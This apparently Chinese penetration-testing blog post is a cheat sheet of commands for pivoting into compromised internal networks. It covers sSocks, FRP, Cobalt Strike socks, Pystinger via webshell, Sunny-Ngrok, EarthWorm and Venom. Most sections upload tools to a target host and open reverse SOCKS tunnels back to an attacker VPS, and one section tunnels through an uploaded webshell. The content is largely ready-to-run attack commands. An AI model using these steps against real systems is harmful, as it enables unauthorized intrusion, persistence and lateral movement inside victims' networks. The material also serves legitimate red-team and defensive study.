sSocket
下载地址:https://sourceforge.net/projects/ssocks/
一个socks代理工具套装,可用来开启socks代理服务,支持socks5验证,支持IPV6和UDP,并提供反向socks代理服务。
vps监听1088端口:
1 | rcsocket.exe –l 1088 –p 8888 –vv |
内网目标机器执行:
1 | ./rssocks –vv –s VPSip:8888 |
FRP
frp下载链接:https://github.com/fatedier/frp/releases
frps上传到服务器上;frpc是要放到目标机上。
1、配置服务端
修改frps.ini服务器端配置文件
1 | [common] |
2、配置客户端
修改frpc.ini客户端配置文件:
1 | [common] |
3、启动
1 | 先启动服务端:./frps -c ./frps.ini |
4、设置代理工具,连接到vps公网ip的10800端口
5、开机自启
Linux环境下,frp只能通过systemd方式自启。
frp_0.34.3_linux_amd64.tar.gz
解压之后可以看到一个 systemd
目录,将其中的 frps.service
文件复制到服务器的 /etc/systemd/system/
目录下,并修改 ExecStart=/usr/local/frp/frps -c /usr/local/frp/frps.ini
。
1 | [Unit] |
命令
1 | #重新加载配置文件 |
CobaltStrike
1 | beacon > socks 1024 #端口根据VPS实际情况进行设置 |
Cs菜单栏View > Proxy Pivots
,复制代理连接到Metasploit中,或直接将socks4a挂在相关安全工具中。
Pystinger
毒刺(pystinger)通过webshell实现内网SOCK4代理, 端口映射.
可直接用于metasploit-framework, viper, cobalt strike上线.
主体使用python开发, 当前支持php, jsp(x), aspx三种代理脚本.
上传代理脚本到目标服务器
在目标主机执行命令开启stinger_server服务
1
2
3
4
5# Windows
start stinger_server.exe
# Linux
chmod +x stinger_server && ./stinger_server在公网vps上执行命令打通隧道
1
./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
此时已经在vps
127.0.0.1:60000
启动了一个example.com
所在内网的socks4a代理此时已经将目标服务器的
127.0.0.1:60020
映射到vps的127.0.0.1:60020
用proxychains验证socks4a代理是否工作正常
Sunny-Ngrok
官网链接:http://ngrok.cc/
支持HTTPS、TCP、UDP流量转发。使用方式参考官方文档。
- 首先在Ngrok官网进行账号注册
- 注册完进入系统,访问
开通隧道
,选择免费服务: - 进行隧道配置
- 隧道协议
- 隧道名称:随意
- 前置域名:随意,默认域名后缀为ngrok.cc
- 本地端口
- 配置完毕并添加后,服务器自动分配了一个免费域名用于与目标站点进行映射
- 在隧道管理中,点击”客户端下载”,并将客户端工具sunny.exe上传至目标服务器
- 在目标服务器执行sunny,建立隧道连接:
sunny.exe clientid 隧道id
- 此时在公网访问 Ngrok 服务器分配给我们的域名即可访问到服务器。
类似的一个,不过仅支持HTTP(s)和WSS协议:https://natapp.cn/
Earthworm
官网链接:http://rootkiter.com/EarthWorm/
正向socks5代理
1 | ./ew -s ssocksd -l 1080 |
直接代理工具直接设置为目标IP的1080端口即可
反向socks5代理
公网VPS添加隧道,把本地1080端口收到的代理请求转交给8888端口
1 | ./ew_linux_x64 -s rcsocks -l 1080 -e 8888 |
目标主机开启反弹socks服务,连接公网机器
1 | ./ew_linux_x64 -s rssocks -d 公网VPS的IP -e 8888 |
现在通过公网VPS主机的8888端口可以直接访问内网
多级代理
参考官网文档。
venom
官网链接:https://github.com/Dliv3/Venom
多级网络流量代理工具,可进行端口转发、端口复用、交互式shell等。
admin/agent命令行参数
admin节点和agent节点均可监听连接也可发起连接
admin监听端口,agent发起连接:
1
./admin_macos_x64 -lport 9999
1
./agent_linux_x64 -rhost 192.168.0.103 -rport 9999
agent监听端口,admin发起连接:
1
./agent_linux_x64 -lport 8888
1
./admin_macos_x64 -rhost 192.168.204.139 -rport 8888
节点间通信加密
Venom提供节点间通信加密功能,用户可通过
-passwd
选项指定密码,该密码用于生成AES加密所需的密钥。1
2
3
4
5# 通过-passwd指定密码为dlive@dubhe
./admin_macos_x64 -lport 8889 -passwd dlive@dubhe
# agent指定相同的密码与admin节点连接
./agent_macos_x64 -rhost 192.168.0.103 -rport 8889 -passwd dlive@dubhe
参考
- Post title:内网流量代理
- Post author:ssooking
- Create time:2020-05-18 11:18:00
- Post link:https://ssooking.github.io/2020/05/内网流量代理/
- Copyright Notice:All articles in this blog are licensed under BY-NC-SA unless stating additionally.